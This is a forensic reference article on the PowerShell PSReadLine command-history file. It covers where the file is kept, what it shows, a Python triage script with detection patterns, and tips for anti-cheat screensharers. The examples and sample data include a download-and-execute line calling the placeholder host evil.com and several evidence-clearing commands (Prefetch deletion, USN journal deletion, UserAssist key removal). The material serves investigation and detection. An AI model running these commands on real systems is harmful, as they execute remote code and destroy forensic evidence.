PowerShell Command History

Purpose and Function

The PowerShell Command History is a feature of the PSReadLine module, which is the default command-line editing experience in modern PowerShell consoles (Windows 10/11 and newer). Its primary function is to provide convenience for the user by saving a history of all commands typed into interactive PowerShell sessions. This allows users to easily recall and re-run previous commands by pressing the up/down arrow keys.

From a DFIR perspective, this user-centric feature creates a plaintext, chronological log of an administrator's or user's actions on the command line. It can provide an unfiltered, verbatim record of manual system interaction, script execution, and potential anti-forensic activities.

Location and Structure

The command history is stored in a simple plain-text file.

  • Location: %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

    • This typically resolves to: C:\Users\%username%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

The structure of the ConsoleHost_history.txt file is straightforward: each command entered by the user is appended as a new line in the file. The file does not typically store timestamps for each individual command, but the "Date Modified" timestamp of the file itself indicates the time when the last command was added (i.e., when the last interactive PowerShell session was closed).

Stored Metadata

The artifact itself is simple, containing only the raw commands as typed by the user. However, this raw data is incredibly valuable:

  • Verbatim Commands: It logs the exact commands, switches, and arguments used. This can reveal file paths, registry keys being manipulated, URLs being accessed, or encoded scripts being executed.

  • Chronological Order: Commands are stored in the order they were executed within and across sessions, providing a logical sequence of user actions.

  • User Attribution: The file is stored within a specific user's AppData profile, directly linking the command-line activity to that user account.

Forensic Value

The PowerShell command history is an invaluable artifact for reconstructing an attacker's or a malicious user's manual actions.

  • Revealing Manual Anti-Forensics: It is one of the best places to find evidence of manual evidence clearing. Commands like del C:\Windows\Prefetch\*.pf, fsutil usn deletejournal /D C:, or reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist may be captured verbatim.

  • Uncovering "Fileless" Execution: It can capture the initial commands used to execute fileless malware or bypasses. This includes commands that download and execute scripts directly in memory (IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')) or run encoded commands (powershell.exe -EncodedCommand ...).

  • Tracking File System Manipulation: It logs commands used for creating, moving, renaming, or deleting files and directories (New-Item, Move-Item, Rename-Item, Remove-Item).

  • Identifying System Reconnaissance: It can show commands used by an attacker to gather information about the system, such as Get-Process, Get-Service, or network enumeration commands.

It is important to note that this file only records commands entered at an interactive PowerShell prompt. Commands executed by scripts that are run non-interactively (e.g., right-click -> "Run with PowerShell") are generally not written to it. A savvy user can also delete the ConsoleHost_history.txt file to clear their tracks, and PSReadLine's HistorySaveStyle option can be set so that no history is saved at all, so confirm the current setting (Get-PSReadLineOption) before treating an absent file as proof of deletion.
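The file layout described under "Location and Structure" and the four categories listed under "Forensic Value" above, as an added triage script written for this page (it is not PSReadLine's own code nor part of any tool the page describes). It assumes the PSReadLine convention that a multi-line command is stored as consecutive lines with a trailing backtick on every line except the last, and that an -EncodedCommand payload is base64 of UTF-16LE text; the pattern lists, category names and the sample history are the editor's own constructions, and the file_status helper only exercises the "Date Modified" point, since the write time is the sole timestamp the artifact carries.

```python
"""Triage helper for a PSReadLine ConsoleHost_history.txt (added example, not
PSReadLine's code; pattern lists and sample data are the editor's constructions)."""
from __future__ import annotations

import base64
import re
from datetime import datetime, timezone
from pathlib import Path

# Detection families for the categories in the text (assumption: illustrative only).
PATTERNS = {
    "anti_forensics": [
        r"\\Prefetch\\",                           # deleting Prefetch files
        r"fsutil\s+usn\s+deletejournal",
        r"reg\s+delete\s+.*UserAssist",
        r"ConsoleHost_history\.txt",               # tampering with this artifact
    ],
    "fileless_execution": [
        r"\bIEX\b|Invoke-Expression",
        r"DownloadString|DownloadFile",
        r"-(?:EncodedCommand|enc|ec|e)\s+[A-Za-z0-9+/=]{16,}",
    ],
    "filesystem": [
        r"\b(?:New|Move|Rename|Remove)-Item\b|\bdel\b",
        r"Start-Process\s+\S+\.(?!exe\b|ps1\b)\w+",  # launched via an odd extension
    ],
    "recon": [r"Get-Process|Get-Service|ipconfig|netstat"],
}
COMPILED = {c: [re.compile(p, re.IGNORECASE) for p in ps] for c, ps in PATTERNS.items()}
ENCODED_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def parse_history(text: str) -> list[str]:
    """Split file text into commands. Assumption: PSReadLine stores a multi-line
    command as consecutive lines, each except the last ending in a backtick."""
    commands, buf = [], []
    for line in text.splitlines():
        if line.endswith("`"):
            buf.append(line[:-1])
            continue
        buf.append(line)
        cmd, buf = "\n".join(buf), []
        if cmd.strip():
            commands.append(cmd)
    if buf:                                        # file ended mid-continuation
        commands.append("\n".join(buf))
    return commands


def decode_encoded_command(command: str) -> str | None:
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE text)."""
    m = ENCODED_RE.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(commands: list[str]) -> list[tuple[int, str, str, str | None]]:
    """One (index, category, command, decoded_payload) row per matching family."""
    findings = []
    for idx, cmd in enumerate(commands):           # idx keeps the file's order
        for cat, regs in COMPILED.items():
            if any(r.search(cmd) for r in regs):
                findings.append((idx, cat, cmd, decode_encoded_command(cmd)))
    return findings


def file_status(path: str, recent_minutes: int = 30) -> dict:
    """The write time is the only timestamp this artifact carries; a missing or
    just-rewritten file next to older PowerShell traces is the clearing signal."""
    p = Path(path)
    if not p.is_file():
        return {"present": False, "modified": None, "recently_modified": False}
    mtime = datetime.fromtimestamp(p.stat().st_mtime, tz=timezone.utc)
    age = (datetime.now(timezone.utc) - mtime).total_seconds() / 60
    return {"present": True, "modified": mtime, "recently_modified": age <= recent_minutes}


# Constructed sample (not from a real host). Entry 4 is multi-line as PSReadLine
# writes it; the last entry carries a harmless encoded command built right here.
SAMPLE_ENCODED = base64.b64encode("Write-Host hello".encode("utf-16-le")).decode("ascii")
SAMPLE_HISTORY = "\n".join([
    "Get-Process",
    r"del C:\Windows\Prefetch\*.pf",
    "fsutil usn deletejournal /D C:",
    "foreach ($f in Get-ChildItem) {`",
    "    Rename-Item $f ($f.Name + '.tmp')`",
    "}",
    r"Start-Process C:\Users\Player\Desktop\cheat.tmp",
    "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')",
    "powershell.exe -EncodedCommand " + SAMPLE_ENCODED,
])

if __name__ == "__main__":
    for idx, cat, cmd, decoded in triage(parse_history(SAMPLE_HISTORY)):
        print(f"[{idx}] {cat:<18} {cmd.splitlines()[0]}" + (f"  => {decoded}" if decoded else ""))
```

Run it against a real file with triage(parse_history(Path(...).read_text(encoding="utf-8-sig"))) and file_status(str(path)); a command that hits several families appears once per family, so the finding count can exceed the command count, and only rows whose fourth field is non-empty carried a decodable encoded payload.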

Reflection points (SS Contest)

For a ScreenSharer, the PowerShell history file is a direct transcript of a player's command-line activities and a prime location for finding "smoking gun" evidence of bypass attempts.

  • The Confession Log: This artifact can feel like reading a confession. Finding the exact command a player typed to delete their Prefetch folder (Remove-Item C:\Windows\Prefetch\* -Recurse), clear a registry key, or execute a loader script is undeniable proof of intent.

  • Exposing Spoofed Extension Execution: If a player uses a command like Start-Process C:\Users\Player\Desktop\cheat.tmp to run a renamed cheat, that exact command might be logged in the history file, directly proving the execution of a disguised executable.

  • A Quick, High-Value Check: During a screenshare, simply opening the ConsoleHost_history.txt file in Notepad is a fast and effective check. A quick scroll can immediately reveal suspicious activity that warrants deeper investigation.

  • Evidence of Clearing: If the history file is missing, or its "Date Modified" timestamp is very recent (suggesting it was just wiped and recreated), and you find evidence of PowerShell execution in other artifacts (like Prefetch for powershell.exe), you have a strong case for evidence clearing.
